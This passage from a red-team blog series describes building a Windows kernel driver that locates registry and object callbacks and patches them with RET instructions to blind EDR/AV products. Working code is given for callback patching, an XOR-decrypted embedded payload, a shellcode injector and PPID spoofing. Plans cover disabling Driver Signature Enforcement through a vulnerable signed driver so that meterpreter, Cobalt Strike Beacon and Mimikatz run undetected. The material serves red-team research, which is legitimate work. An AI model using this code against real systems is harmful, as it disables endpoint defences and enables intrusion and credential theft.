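// Caller side: start small and double the buffer until the text fits.
// Returns an empty vector if a sanity limit is reached.
std::vector<wchar_t> FormatWithRetry(const wchar_t* name, int index) {
    for (std::size_t chars = 8; chars <= (1u << 16); chars *= 2) {
        std::vector<wchar_t> storage(chars, L'\0');
        std::size_t remaining = storage.size() * sizeof(wchar_t);
        wchar_t* cursor = storage.data();
        OutBuffer out{ &remaining, &cursor };
        if (AppendFormat(&out, L"[%02d] %ls\n", index, name)) return storage;
    }
    return {};
}
```

Since the cursor and the remaining size are only updated on success, several AppendFormat() calls can be chained on the same OutBuffer, and the number of bytes written is the original size minus what remains, which is the same subtraction the driver uses for its information value.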

3. Recalling the callbacks

As mentioned in previous blogposts, locating the different callback arrays and implementing a function to patch them was fairly straightforward. Apart from process and thread callbacks, I also added in the PsSetLoadImageNotifyRoutineEx() callback, which alerts a driver whenever a new image is loaded or mapped into memory.

Registry and object creation/duplication callbacks work slightly differently when it comes to how the callback function addresses are stored. Instead of a callback array containing function pointers, the function pointers for registry and object callbacks are stored in a doubly linked list. This means that instead of looking for a callback array address, we’ll be looking for the address of the CallbackListHead.

CallbackListHead

Instead of going the same route as with the callback arrays, where I enumerated the instructions in the NotifyRoutine() functions looking for a series of opcodes, I decided to enumerate the CmUnRegisterCallback() function, which is used to remove a registry callback. The reason behind this approach is that in order to obtain the CallbackListHead address via CmRegisterCallback(), we need to follow 2 calls (0xE8) to CmpRegisterCallbackInternal() and CmpInsertCallbackInListByAltitude(). By using CmUnRegisterCallback() instead, we only need to look for a LEA RCX (0x48 0x8D 0x0D) instruction, which puts the address of the CallbackListHead into RCX.

ULONG64 FindCmUnregisterCallbackCallbackListHead() {
	UNICODE_STRING func;
	RtlInitUnicodeString(&func, L"CmUnRegisterCallback");

	ULONG64 funcAddr = (ULONG64)MmGetSystemRoutineAddress(&func);

	if (funcAddr == 0)
		return 0;

	for (ULONG64 instructionAddr = funcAddr; instructionAddr < funcAddr + 0xff; instructionAddr++) {
		if (*(PUCHAR)instructionAddr == OPCODE_LEA_RCX_7[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 1) == OPCODE_LEA_RCX_8[g_WindowsIndex] &&
			*(PUCHAR)(instructionAddr + 2) == OPCODE_LEA_RCX_9[g_WindowsIndex]) {

			//the 32-bit displacement is signed and relative to the end of the 7-byte instruction
			LONG OffsetAddr = 0;
			memcpy(&OffsetAddr, (PUCHAR)(instructionAddr + 3), sizeof(OffsetAddr));
			return instructionAddr + 7 + OffsetAddr;
		}
	}
	return 0;
}
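
The address arithmetic can be checked on a synthetic byte buffer. This is a minimal user-mode sketch, assuming the 7-byte encoding 48 8D 0D followed by a signed 32-bit displacement. ResolveLeaRcx is a hypothetical helper, and offsets into the buffer stand in for kernel addresses.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Scans [base, base + scanLen) inside `image` for LEA RCX, [RIP + disp32]
// (48 8D 0D xx xx xx xx) and returns the referenced offset within `image`,
// or -1 if the pattern is not found.
std::ptrdiff_t ResolveLeaRcx(const std::uint8_t* image, std::size_t imageSize,
                             std::size_t base, std::size_t scanLen) {
    for (std::size_t i = base; i < base + scanLen && i + 7 <= imageSize; ++i) {
        if (image[i] == 0x48 && image[i + 1] == 0x8D && image[i + 2] == 0x0D) {
            // Signed displacement: the target may lie before the code
            std::int32_t disp = 0;
            std::memcpy(&disp, image + i + 3, sizeof(disp));

            // RIP points at the end of the 7-byte instruction
            return static_cast<std::ptrdiff_t>(i) + 7 + disp;
        }
    }
    return -1;
}
```

Treating the displacement as signed matters whenever the referenced data sits at a lower address than the instruction. Reading it as an unsigned value would land roughly 4 GB too high in that case.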

Once we have the CallbackListHead address, we can use it to enumerate the doubly linked list and retrieve the callback function pointers. The structure we’re working with can be defined as:

typedef struct _CMREG_CALLBACK {
    LIST_ENTRY List;
    ULONG Unknown1;
    ULONG Unknown2;
    LARGE_INTEGER Cookie;
    PVOID Unknown3;
    PEX_CALLBACK_FUNCTION Function;
} CMREG_CALLBACK, *PCMREG_CALLBACK;

The registered callback function pointer is located at offset 0x28.

PVOID* CallbackListHead = (PVOID*)FindCmUnregisterCallbackCallbackListHead();
PLIST_ENTRY pEntry;
ULONG64 i;

if (CallbackListHead) {
    for (pEntry = (PLIST_ENTRY)*CallbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)CallbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
        ULONG64 callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
        KdPrint((DRIVER_PREFIX "[%02llu] 0x%llx\n", i, callbackFuncAddr));
        //<truncated>   
    }
}
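
The traversal itself can be exercised in user mode with a hand-built circular list. The sketch below mirrors the CMREG_CALLBACK layout shown above, with field names taken from the post. ListEntry, InitList, PushBack, CollectCallbacks and the two dummy callbacks are stand-ins invented for illustration.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

// Stand-in for LIST_ENTRY
struct ListEntry {
    ListEntry* Flink;
    ListEntry* Blink;
};

using CallbackFn = long (*)(void*, void*, void*);

// Mirrors the CMREG_CALLBACK layout above
struct CmRegCallback {
    ListEntry     List;
    std::uint32_t Unknown1;
    std::uint32_t Unknown2;
    std::int64_t  Cookie;
    void*         Unknown3;
    CallbackFn    Function;
};
static_assert(sizeof(void*) != 8 || offsetof(CmRegCallback, Function) == 0x28,
              "Function is expected at offset 0x28 on 64-bit builds");

// An empty circular list has a head that points at itself
void InitList(ListEntry* head) {
    head->Flink = head;
    head->Blink = head;
}

void PushBack(ListEntry* head, ListEntry* entry) {
    entry->Flink = head;
    entry->Blink = head->Blink;
    head->Blink->Flink = entry;
    head->Blink = entry;
}

// Walks the list until it wraps around to the head again
std::vector<CallbackFn> CollectCallbacks(ListEntry* head) {
    std::vector<CallbackFn> result;
    for (ListEntry* e = head->Flink; e != head; e = e->Flink) {
        // List is the first member, so the entry pointer is also the record pointer
        auto* record = reinterpret_cast<CmRegCallback*>(e);
        result.push_back(record->Function);
    }
    return result;
}

// Dummy callbacks used to populate the model list
long CallbackA(void*, void*, void*) { return 0; }
long CallbackB(void*, void*, void*) { return 1; }
```

The loop condition is the important part: the list is circular, so the walk ends when the current entry is the head again, not when a null pointer is reached.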

4. Conclusion

In this blogpost we took a brief look at the structure of the Interceptor kernel driver and how we can handle I/O between the kernel driver and user mode application without the need to create a crazy amount of structures. We then ventured back into callback land and took a peek at obtaining the CallbackListHead address of the doubly linked list containing registered registry callback function pointers (try saying that quickly 5 times in a row 😉 ).


Kernel Karnage – Part 6 (Last Call)

9 December 2021 at 13:04

With the release of this blogpost, we’re past the halfway point of my internship; time flies when you’re having fun.

1. Introduction – Status Report

In the course of these 6 weeks, I’ve covered several aspects of kernel drivers and EDR/AV kernel mechanisms. I started off strong by examining kernel callbacks and why EDR/AV products use them extensively to gain vision into what’s happening on the system. I confirmed these concepts by leveraging existing work against $vendor1 and successfully executing Mimikatz on the compromised system.

Then I took a step back and did a deep dive into the inner structure and workings of a kernel driver, how it communicates with other drivers and applications and how I can intercept these communications using IRP MajorFunction hooks.

Once I had the basics sorted and got comfortable working with the kernel and a kernel debugger, I started developing my own driver called Interceptor, which has kernel callback patching and IRP MajorFunction hooking capabilities. I took the driver for a test drive against $vendor2 and concluded that attacking an EDR/AV product from kernel land alone is not sufficient and user land detection techniques should be taken into consideration as well.

To solve this problem, I then developed a custom shellcode injector using the EarlyBird technique, which combined with the Interceptor driver was able to partially bypass $vendor2 and launch a meterpreter session on the compromised system.

After this small success, I spent a good amount of time on code maintenance, refactoring, bug fixing and research, which has brought me to today’s blogpost. In this blogpost I would like to conclude the kernel callbacks, having solved my issues with registry and object callbacks, revisit the shellcode injector in a bit more detail and once more bring the fight to $vendor2. Let’s get to it, shall we?

2. Last call

Having covered process, thread and image callbacks in the previous blogposts, I think it’s only fair if we conclude this topic with registry and object callbacks. In the previous blogpost, I demonstrated how we can retrieve and enumerate the registry callback doubly linked list. The code to patch and subsequently restore these callbacks is almost identical, using the same iteration method. For the sake of simplicity, I decided to store the patched callbacks internally in an array of size 64, instead of another linked list.

for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; pEntry != (PLIST_ENTRY)callbackListHead; pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    auto callbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x028);
    CR0_WP_OFF_x64();
    PULONG64 pPointer = (PULONG64)callbackFuncAddr;

    switch (callback) {
      case registry:
        g_CallbackGlobals.RegistryCallbacks[index].patched = true;
        memcpy(g_CallbackGlobals.RegistryCallbacks[index].instruction, pPointer, 8);
        break;
      default:
        //re-enable write protection before bailing out
        CR0_WP_ON_x64();
        return STATUS_NOT_SUPPORTED;
    }

    *pPointer = (ULONG64)0xC3;
    CR0_WP_ON_x64();
    return STATUS_SUCCESS;
  }
}
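
The save, patch and restore cycle can be modelled on an ordinary byte buffer, without touching CR0 or kernel memory. In this sketch, PatchRecord, PatchWithRet and RestorePatch are hypothetical names. The only thing carried over from the loop above is the idea of keeping the first 8 bytes and overwriting them with a RET (0xC3) followed by zero bytes.

```cpp
#include <array>
#include <cstddef>
#include <cstdint>
#include <cstring>

constexpr std::size_t kPatchSize = 8;

// Per-callback bookkeeping: patch state plus the saved original bytes
struct PatchRecord {
    bool patched = false;
    std::array<std::uint8_t, kPatchSize> instruction{};
};

// Saves the first 8 bytes at `target`, then overwrites them with
// C3 00 00 00 00 00 00 00 (a RET followed by padding).
bool PatchWithRet(std::uint8_t* target, PatchRecord& record) {
    if (record.patched) return false;  // never overwrite the saved copy
    std::memcpy(record.instruction.data(), target, kPatchSize);
    std::memset(target, 0, kPatchSize);
    target[0] = 0xC3;
    record.patched = true;
    return true;
}

// Puts the saved bytes back
bool RestorePatch(std::uint8_t* target, PatchRecord& record) {
    if (!record.patched) return false;
    std::memcpy(target, record.instruction.data(), kPatchSize);
    record.patched = false;
    return true;
}
```

Refusing to patch an already patched entry is a deliberate choice in this model: a second patch would save the RET bytes as the "original" and make a later restore impossible.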

With the registry callbacks patched and taken care of, it’s time to jump the last hurdle, and it’s a big one: object callbacks. Out of all the kernel callbacks, object callbacks definitely gave me the most grief and I still don’t understand them 100%. There is only limited documentation out there and most of it covers object callbacks themselves and how to use them, not how to bypass or disable them. Nonetheless, I found a couple of good resources which I think are worth sharing:

2.1 What is this Object Callbacks black magic?

Object callbacks are called as a result of process / thread / desktop HANDLE operations. They can either be called before the operation takes place (POB_PRE_OPERATION_CALLBACK) or after the operation completes (POB_POST_OPERATION_CALLBACK). A good example is the OpenProcess() API call, which returns an open HANDLE to the target local process object if it succeeds. When OpenProcess() is called, a pre-operation callback can be triggered, and when OpenProcess() returns, a post-operation callback can be triggered.

Object callbacks only work on process objects, thread objects and desktop objects. The most common use case for these object callbacks is to modify the requested access rights to said object. If I were to attach a debugger to an EDR/AV process by using OpenProcess() with the PROCESS_ALL_ACCESS flag, the EDR/AV would most likely use an object callback to change the granted access rights to something like PROCESS_QUERY_LIMITED_INFORMATION to protect itself.
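
The access-stripping logic boils down to a bit mask operation on the desired access. The sketch below models it in user mode: the access-right values are the ones from the Windows SDK headers, while FilterDesiredAccess and the "allowed" policy are hypothetical and only illustrate what a self-protecting product might do in its pre-operation callback.

```cpp
#include <cstdint>

// Process access rights, values as defined in the Windows SDK headers
constexpr std::uint32_t kProcessTerminate               = 0x0001;
constexpr std::uint32_t kProcessVmOperation             = 0x0008;
constexpr std::uint32_t kProcessVmRead                  = 0x0010;
constexpr std::uint32_t kProcessVmWrite                 = 0x0020;
constexpr std::uint32_t kProcessQueryLimitedInformation = 0x1000;
constexpr std::uint32_t kProcessAllAccess               = 0x1FFFFF;

// Hypothetical policy: the only right left intact for a protected process
constexpr std::uint32_t kAllowedForProtected = kProcessQueryLimitedInformation;

// Model of pre-operation callback logic: rights are only ever removed
constexpr std::uint32_t FilterDesiredAccess(std::uint32_t desired,
                                            bool targetIsProtected) {
    return targetIsProtected ? (desired & kAllowedForProtected) : desired;
}

static_assert(FilterDesiredAccess(kProcessAllAccess, true) ==
                  kProcessQueryLimitedInformation,
              "all other rights are stripped for a protected target");
static_assert(FilterDesiredAccess(kProcessAllAccess, false) == kProcessAllAccess,
              "unprotected targets are left alone");
```

With such a filter in place, the OpenProcess() call still succeeds, but the returned HANDLE carries fewer rights than requested, so later operations such as reading or writing process memory fail with access denied.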

2.2 Where can I find one for myself?

I’m glad you asked! Turns out they’re a little bit harder to locate. Windows contains a very important structure called OBJECT_TYPE which is defined as:

typedef struct _OBJECT_TYPE {
  LIST_ENTRY TypeList;
  UNICODE_STRING Name;
  PVOID DefaultObject; 
  UCHAR Index;
  ULONG TotalNumberOfObjects;
  ULONG TotalNumberOfHandles;
  ULONG HighWaterNumberOfObjects;
  ULONG HighWaterNumberOfHandles;
  OBJECT_TYPE_INITIALIZER TypeInfo; //unsigned char TypeInfo[0x78];
  EX_PUSH_LOCK TypeLock;
  ULONG Key;
  LIST_ENTRY CallbackList; //offset 0xC8
} OBJECT_TYPE, *POBJECT_TYPE;
OBJECT_TYPE STRUCT

This structure is used to define the process and thread objects, which are the only two object types that allow callbacks on their creation and copying, and is stored in the global variables: **PsProcessType and **PsThreadType. It also contains a linked list entry LIST_ENTRY CallbackList, which points to a CALLBACK_ENTRY_ITEM structure defined as:

typedef struct _CALLBACK_ENTRY_ITEM {
	LIST_ENTRY EntryItemList;
	OB_OPERATION Operations;
	DWORD Active;
	PCALLBACK_ENTRY CallbackEntry;
	POBJECT_TYPE ObjectType;
	POB_PRE_OPERATION_CALLBACK PreOperation; //offset 0x28
	POB_POST_OPERATION_CALLBACK PostOperation; //offset 0x30
	__int64 unk;
} CALLBACK_ENTRY_ITEM, * PCALLBACK_ENTRY_ITEM;

The POB_PRE_OPERATION_CALLBACK PreOperation and POB_POST_OPERATION_CALLBACK PostOperation members contain the function pointers to the registered callback routines.

2.3 Show me the code!

The above-mentioned global variables **PsProcessType and **PsThreadType can be used to grab a POBJECT_TYPE struct, which contains the LIST_ENTRY CallbackList address at offset 0xC8.

PVOID* FindObRegisterCallbacksListHead(POBJECT_TYPE pObType) {
  //POBJECT_TYPE pObType = *PsProcessType;
	return (PVOID*)((__int64)pObType + 0xc8);
}
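
The hard-coded offsets can be sanity-checked at compile time by rebuilding the two structures in user mode. This is a sketch under stated assumptions: the models follow the definitions given in this post, TypeInfo is treated as an opaque, pointer-aligned 0x78-byte blob, EX_PUSH_LOCK is modelled as one pointer-sized value, and the checks only apply to 64-bit builds. The real layouts are undocumented and can differ between Windows versions.

```cpp
#include <cstddef>
#include <cstdint>

struct ListEntry { ListEntry* Flink; ListEntry* Blink; };
struct UnicodeString {
    std::uint16_t Length;
    std::uint16_t MaximumLength;
    wchar_t*      Buffer;
};

// Layout model of OBJECT_TYPE as listed above
struct ObjectTypeModel {
    ListEntry      TypeList;
    UnicodeString  Name;
    void*          DefaultObject;
    std::uint8_t   Index;
    std::uint32_t  TotalNumberOfObjects;
    std::uint32_t  TotalNumberOfHandles;
    std::uint32_t  HighWaterNumberOfObjects;
    std::uint32_t  HighWaterNumberOfHandles;
    alignas(8) unsigned char TypeInfo[0x78];  // opaque OBJECT_TYPE_INITIALIZER
    std::uintptr_t TypeLock;                  // EX_PUSH_LOCK modelled as a pointer
    std::uint32_t  Key;
    ListEntry      CallbackList;
};

// Layout model of CALLBACK_ENTRY_ITEM as listed above
struct CallbackEntryItemModel {
    ListEntry     EntryItemList;
    std::uint32_t Operations;
    std::uint32_t Active;
    void*         CallbackEntry;
    void*         ObjectType;
    void*         PreOperation;
    void*         PostOperation;
    std::int64_t  unk;
};

constexpr bool kIs64Bit = sizeof(void*) == 8;
static_assert(!kIs64Bit || offsetof(ObjectTypeModel, CallbackList) == 0xC8,
              "CallbackList expected at 0xC8");
static_assert(!kIs64Bit || offsetof(CallbackEntryItemModel, PreOperation) == 0x28,
              "PreOperation expected at 0x28");
static_assert(!kIs64Bit || offsetof(CallbackEntryItemModel, PostOperation) == 0x30,
              "PostOperation expected at 0x30");

// Same pointer arithmetic as FindObRegisterCallbacksListHead(), on the model
ListEntry* CallbackListHeadOf(ObjectTypeModel* type) {
    return reinterpret_cast<ListEntry*>(
        reinterpret_cast<unsigned char*>(type) + 0xC8);
}
```

If any of the static_assert checks fail after a change to the models, the raw offsets used in the driver code no longer match the structure definitions, which is a cheap way to catch a transcription error before it turns into a bug check.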

The CallbackList address can then be used to enumerate the linked list in a similar manner as the registry callback list and patch the pre- and post-operation callback function pointers. The pre- and post-operation callbacks are located at offsets 0x28 and 0x30 in the CALLBACK_ENTRY_ITEM structure.

for (pEntry = (PLIST_ENTRY)*callbackListHead, i = 0; NT_SUCCESS(status) && (pEntry != (PLIST_ENTRY)callbackListHead); pEntry = (PLIST_ENTRY)(pEntry->Flink), i++) {
  if (i == index) {
    //grab pre-operation callback function address at offset 0x28
    auto preOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x28);
    if (MmIsAddressValid((PVOID*)preOpCallbackFuncAddr)) {
      CR0_WP_OFF_x64();

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)preOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][0].instruction, pPointer, 8);
          break;
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][0].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][0].instruction, pPointer, 8);
          break;
        default:
          //re-enable write protection before bailing out
          CR0_WP_ON_x64();
          return STATUS_NOT_SUPPORTED;
      }

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;

      CR0_WP_ON_x64();

      return STATUS_SUCCESS;
    }

    //grab post-operation callback function address at offset 0x30
    auto postOpCallbackFuncAddr = *(ULONG64*)((ULONG_PTR)pEntry + 0x30);
    if (MmIsAddressValid((PVOID*)postOpCallbackFuncAddr)) {
      CR0_WP_OFF_x64();

      //get a pointer to the registered callback function
      PULONG64 pPointer = (PULONG64)postOpCallbackFuncAddr;

      //save the original instruction, used to restore the callback
      switch (callback) {
        case object_process:
          g_CallbackGlobals.ObjectProcessCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectProcessCallbacks[index][1].instruction, pPointer, 8);
          break;
        case object_thread:
          g_CallbackGlobals.ObjectThreadCallbacks[index][1].patched = true;
          memcpy(g_CallbackGlobals.ObjectThreadCallbacks[index][1].instruction, pPointer, 8);
          break;
        default:
          //restore write protection before bailing out
          CR0_WP_ON_x64();
          return STATUS_NOT_SUPPORTED;
      }

      //patch the callback function with a RET (0xC3)
      *pPointer = (ULONG64)0xC3;

      CR0_WP_ON_x64();

      return STATUS_SUCCESS;
    }
  }
}

Interceptor patch object callback
patched process object callback
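To make the 0x28 and 0x30 offsets easier to picture, here is a minimal, portable sketch of how such a layout could look on x64. Only the two callback offsets come from the text above; the structure name, the remaining field names and their sizes are assumptions used to pad the structure, since CALLBACK_ENTRY_ITEM is undocumented. ReadQwordAt() is a hypothetical helper that mirrors the pointer arithmetic used in the loop.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

// Hypothetical mirror of the undocumented CALLBACK_ENTRY_ITEM layout on x64.
// Only the 0x28 and 0x30 offsets are taken from the text; every other field
// name and size is an assumption that merely pads the structure.
struct CallbackEntryItemSketch {
    std::uint64_t flink;          // 0x00 list entry forward link
    std::uint64_t blink;          // 0x08 list entry backward link
    std::uint32_t operations;     // 0x10 (assumed)
    std::uint32_t active;         // 0x14 (assumed)
    std::uint64_t callbackEntry;  // 0x18 (assumed)
    std::uint64_t objectType;     // 0x20 (assumed)
    std::uint64_t preOperation;   // 0x28 pre-operation callback pointer
    std::uint64_t postOperation;  // 0x30 post-operation callback pointer
};

static_assert(offsetof(CallbackEntryItemSketch, preOperation) == 0x28, "pre-op offset");
static_assert(offsetof(CallbackEntryItemSketch, postOperation) == 0x30, "post-op offset");

// Read a 64-bit value at a byte offset from the start of an entry.
// memcpy is used instead of a pointer cast to stay clear of aliasing issues.
std::uint64_t ReadQwordAt(const void* entry, std::size_t offset) {
    std::uint64_t value = 0;
    std::memcpy(&value, static_cast<const unsigned char*>(entry) + offset, sizeof(value));
    return value;
}
```

The static_assert lines document the offsets at compile time, so a wrong assumption about the padding fields would fail the build instead of silently reading the wrong pointer.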

3. Interceptor vs $vendor2: Round 2

In my previous attempt to bypass $vendor2 and run a meterpreter reverse TCP shell on the compromised system, the attack was detected, but not blocked. My EarlyBird shellcode injector used a staged payload to connect back to the metasploit framework and fetch the meterpreter payload, which then got flagged by $vendor2.

To try and solve this issue, I decided not to use a staged payload, but instead embed the whole meterpreter payload in the binary itself. Since the payload size is around 200,000 bytes, embedding it as a hexadecimal string is impractical at best, and it would be flagged immediately by any static analysis. Instead, one of my colleagues, Firat Acar, suggested I could embed the payload as an encrypted resource and load and decrypt it at runtime in memory.

The code for this is surprisingly simple:

HRSRC scResource = FindResource(NULL, MAKEINTRESOURCE(IDR_PAYLOAD1), L"payload");
DWORD scSize = SizeofResource(NULL, scResource);
HGLOBAL scResourceData = LoadResource(NULL, scResource);

Once the resource is loaded, a function like memcpy() or NtWriteVirtualMemory() can be used to write it to memory. Once that’s done, it can be decrypted in memory using a simple XOR:

void XORDecryptInMemory(const char* key, int keyLen, int dataLen, LPVOID startAddr) {
	BYTE* t = (BYTE*)startAddr;

	for (int i = 0; i < dataLen; i++) { // int matches the type of dataLen
		t[i] ^= key[i % keyLen];
	}
}

Since my shellcode injector attempts to inject into a remote process, using this decrypt routine will cause a STATUS_ACCESS_VIOLATION exception, since directly accessing memory of a different process is not allowed. Instead functions like NtReadVirtualMemory() and NtWriteVirtualMemory() should be used.
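As a small aside, a repeating-key XOR is its own inverse, so the same routine both encrypts and decrypts. The sketch below shows that property on a local buffer in portable C++; XorInPlace() is a hypothetical helper written for this illustration and is not the injector's code.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <string>
#include <vector>

// Repeating-key XOR over a local buffer.
// Calling it twice with the same key restores the original bytes.
void XorInPlace(std::vector<std::uint8_t>& data, const std::string& key) {
    if (key.empty()) {
        return;  // nothing to do without a key
    }
    for (std::size_t i = 0; i < data.size(); ++i) {
        data[i] ^= static_cast<std::uint8_t>(key[i % key.size()]);
    }
}
```

Because the transformation works on memory the caller owns, it only applies to a buffer in the current process, which is exactly the limitation described above.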

However, after testing this approach against $vendor2, the embedded resource got flagged almost immediately. Maybe a better encryption algorithm like RC4 or AES could work, but that also comes with a lot of overhead to implement.

A different solution to this problem might be to fetch the payload remotely using sockets, in an attempt to avoid using higher level APIs like WinINet. For now I reverted to a staged payload embedded as a hexadecimal string.

With the ability to now patch all the kernel callbacks, I decided to try and bypass $vendor2 once more. I disabled its botnet protection module, which inspects network traffic for potential malicious activity, since this is what flagged the meterpreter traffic in the first place. I wanted to see if apart from network packet inspection, $vendor2 would detect the meterpreter payload. However, after testing with an HTTPS implant, the botnet protection did not detect and block the payload.

4. Conclusion

This blogpost concludes patching the kernel callbacks. While there is more functionality to add and more problems to address from kernel space, such as ETW or minifilters, the main goal of sufficiently crippling an EDR/AV product using a kernel driver has been met. Using Interceptor, we can deploy a meterpreter shell or Cobalt Strike Beacon and even run Mimikatz undetected. The next challenge will be to deploy the driver on a target and bypass protections such as Driver Signature Enforcement.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

Kernel Karnage – Part 7 (Out of the Lab and Back to Reality)

20 December 2021 at 13:49

This week I emerge from the lab and put on a different hat.

1. Switching hats

With Interceptor being successful in blinding $vendor2 sufficiently to run a meterpreter reverse shell, it is time to put on the red team hat and get out of the perfect lab environment. To do just that, I had to revert some settings I turned off at the beginning of this series.

First, I enabled Secure Boot and disabled test signing mode on the target VM. Secure Boot will enable Microsoft’s Driver Signature Enforcement (DSE) policy, which blocks drivers that are not WHQL-signed from being loaded, including my Interceptor driver. It’s important to note I left HyperGuard (HVCI) turned off, because I currently have no way of defeating Virtualization-based protection.

With the target configured, I then set up a Cobalt Strike Teamserver using a Gmail Malleable C2 profile and configured my EarlyBird shellcode injector to deliver an HTTPS Beacon. My idea was to simulate a scenario where an attacker (me) had managed to gain a foothold on the target and obtained an implant with elevated privileges. The attacker would then use the implant to disable DSE on the compromised system and load the Interceptor driver, all directly in memory to keep a low footprint. Once Interceptor has been loaded on the target system, it would cripple the EDR/AV product and allow the attacker to run Mimikatz undetected.

Naturally, nothing ever goes as planned.

2. Outspoofing myself

The first issue I ran into was executing my shellcode injector with elevated privileges. No matter what I tried, I couldn’t seem to get a Beacon callback with elevated privileges, so I took my issue to infosec Twitter and unmasked the culprit with the help of @trickster012.

The code responsible for spawning the spoofed process, into which the Beacon payload is then injected, looks like this:

PROCESS_INFORMATION Spawn(LPSTR procPath, HANDLE parentHandle)
{
    //do dynamic imports
    HMODULE hK32 = GetModuleHandleA("kernel32");
    FARPROC fpInitializeProcThreadAttributeList = GetProcAddress(hK32, "InitializeProcThreadAttributeList");
    _InitializeProcThreadAttributeList InitializeProcThreadAttributeList = (_InitializeProcThreadAttributeList)fpInitializeProcThreadAttributeList;
    FARPROC fpUpdateProcThreadAttribute = GetProcAddress(hK32, "UpdateProcThreadAttribute");
    _UpdateProcThreadAttribute UpdateProcThreadAttribute = (_UpdateProcThreadAttribute)fpUpdateProcThreadAttribute;
    FARPROC fpDeleteProcThreadAttributeList = GetProcAddress(hK32, "DeleteProcThreadAttributeList");
    _DeleteProcThreadAttributeList DeleteProcThreadAttributeList = (_DeleteProcThreadAttributeList)fpDeleteProcThreadAttributeList;

    STARTUPINFOEXA si;
    PROCESS_INFORMATION pi;
    SIZE_T attributeSize;

    memset(&si, 0, sizeof(si));
    memset(&pi, 0, sizeof(pi));

    InitializeProcThreadAttributeList(NULL, 2, 0, &attributeSize);
    si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, attributeSize);
    InitializeProcThreadAttributeList(si.lpAttributeList, 2, 0, &attributeSize);

    DWORD64 policy = PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON;
    //enable CIG
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY, &policy, sizeof(DWORD64), NULL, NULL);
    //PPID spoof: set parentHandle as parent process
    UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentHandle, sizeof(HANDLE), NULL, NULL);

    si.StartupInfo.cb = sizeof(si);
    si.StartupInfo.dwFlags = EXTENDED_STARTUPINFO_PRESENT;

    if (!CreateProcessA(NULL, procPath, NULL, NULL, TRUE, CREATE_SUSPENDED | CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi))
    {
        throw "";
    }

    std::cout << "Process created!" << " PID: " << pi.dwProcessId << "\n";

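    DeleteProcThreadAttributeList(si.lpAttributeList);
    //release the attribute list buffer allocated with HeapAlloc()
    HeapFree(GetProcessHeap(), 0, si.lpAttributeList);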
    NtClose(parentHandle);

    return pi;
}

The Spawn() function takes a parameter HANDLE parentHandle, which is used to set the parent process of the newly created process. The handle would in this case point to explorer.exe as this is the process I was spoofing. @CaptMeelo recently posted a great blogpost titled Picky PPID Spoofing which covers the topic of PPID spoofing quite well.

To make a long story short, as stated in the Microsoft documentation, the to-be-created process inherits certain attributes from its parent process (the one we’re spoofing), and this happens to include the process token. Among the many things contained in a token are the privileges held by the user, or by the user’s groups, associated with the process.

Parent process attributes

If we take a look at explorer.exe in Process Hacker we can see the associated user and token. We can also see that the process is not running in elevated context. Taking into consideration the attribute inheritance, it makes sense that I couldn’t manage to spawn an elevated process with explorer.exe set as parent.

Explorer.exe process hacker

With this issue identified and remediated, I ran head first into the next one: concealing Beacon from EDR/AV. My shellcode injector is still configured to use embedded shellcode, instead of pulling a payload from somewhere else. So far this has worked quite well, using stageless payloads. I replaced the meterpreter payload with one of Cobalt Strike’s stagers, which would then pull a full HTTPS Beacon payload. I have not (yet) modified Beacon, so once the stager pulls the payload, EDR/AV detects a Cobalt Strike artifact in memory and takes action. Uh oh, not good. As of writing this blogpost, I have not yet figured out the answer to this problem. If there are any reader suggestions, you’re more than welcome to share them with me on Twitter.

3. Disabling Driver Signature Enforcement (DSE)

Instead, I decided to move on to the task at hand: disabling driver signature enforcement (DSE) on the target and loading Interceptor. Over the course of my research I stumbled across Kernel Driver Utility (KDU), a tool developed by @hfiref0x. One of the many wondrous things this tool can do is disable Driver Signature Enforcement (DSE). It does this by loading a WHQL-signed driver with an arbitrary kernel memory read/write vulnerability to change the state of ntoskrnl.exe g_CiEnabled or CI.dll g_CiOptions, depending on the build version of Windows.

I tested KDU and it worked well, except it didn’t tick all the boxes required for the scenario:

  1. It got flagged by EDR/AV
  2. It cannot be executed in memory from a Beacon

What I need is a custom Beacon Object File (BOF) whose only purpose is to disable DSE and load Interceptor, or any other malicious driver for that matter. Windows provides APIs like NtLoadDriver() and NtUnloadDriver() to handle loading drivers programmatically; there’s just one catch: drivers cannot be loaded from memory, they need to touch disk, which is not good for OPSEC. To be fair, this statement is not 100% correct, because there are ways to manually map drivers into memory. However, they come with a lot of drawbacks like:

  • Invalid DeviceObject and RegistryPath objects
